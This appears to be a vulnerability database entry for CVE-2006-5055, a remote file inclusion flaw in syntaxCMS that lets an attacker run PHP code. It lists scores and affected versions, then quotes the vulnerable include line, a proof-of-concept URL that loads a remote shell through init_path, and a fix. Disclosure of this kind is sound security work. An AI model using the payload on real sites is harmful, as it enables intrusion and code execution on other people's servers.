7.5
CVSSv2

CVE-2006-5055

Published: 28/09/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in admin/testing/tests/0004_init_urls.php in syntaxCMS 1.1.1 up to and including 1.3 allows remote malicious users to execute arbitrary PHP code via a URL in the init_path parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

forum one syntaxcms 1.2.1

forum one syntaxcms

forum one syntaxcms 1.1.1

forum one syntaxcms 1.1.2

Exploits

Remote File Include in syntaxCMS Vulnerable File: 0004_init_urlsphp Vulnerable Code: 1 <?php 2 include_once( $init_path '/initurlsphp' ); 3 ?> PoC: wwwpoweredbysyntaxcmssitecom/admin/testing/tests/0004_init_urlsphp?init_path=YourShell?& Solution: Remove This Fileit's not neededjust used for ...